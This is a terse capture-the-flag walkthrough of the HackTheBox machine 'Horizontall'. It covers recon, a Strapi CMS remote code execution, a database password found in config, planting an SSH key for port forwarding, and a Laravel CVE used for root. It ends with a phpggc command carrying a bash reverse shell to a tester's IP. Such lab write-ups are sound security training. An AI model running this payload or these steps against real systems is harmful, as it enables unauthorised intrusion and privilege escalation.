Horizontall

nmap scan, open 22, 80, 80 corresponding sites http://horizontall.htb

Visit 80

dirsearch scans, also nothing

After watching wp, I found that there is a new domain name in the js file of the response, although I still can't find it

Visit http://api-prod.horizontall.htb/

Find an admin path, jump to the authentication page after visiting, and use strapiCMS

The familiar routine is Google exp, and then I found RCE

Use the script, successful RCE, but no echo

Rebound shell directly

Check /etc/passwd and see developeruser

strapi users can directly read user.txt in the developer user's home directory

Check local, there is MySQL

Try to find the MySQL database login method, find a bunch of account passwords in database.json under /opt/strapi/myapi/config/environments/development>developer/#J!:F9Zt2u

But this password cannot log in to the developer's ssh, so start with the database.Finally, the ciphertext value of strapi's administrator password is found in the database.

John's blasting didn't come out

Reviewing the previous content, I found that 1337 and 8000 are also open locally.Detect the services of these two ports and find that 8000 is open Lavarel.

Write ssh public key for later port forwarding

Local ssh-keygen generates id_rsa.pub, and then writes the content of id_rsa.pub to in the strapi home directory.ssh/authorized_keysin

Set up ssh port forwarding locally, forward 127.0.0.1:8000 on the 10.10.11.105 host to the local port 8000

When I visit the local 8000 again, I access the Laravel service on port 8000 of 10.10.11.105, the version is v8

Laravel has CVE, which was used in a previous question, so I directly found exp to use it

https://github.com/ambionics/laravel-exploits

Get root privileges directly

Bounce shell

php -d'phar.readonly=0' ./phpggc --phar phar -o /tmp/exploit.phar --fast-destruct monolog/rce1 system "/bin/bash -c 'bash -i >& /dev/tcp/10.10.14.3/1234 0>&1'"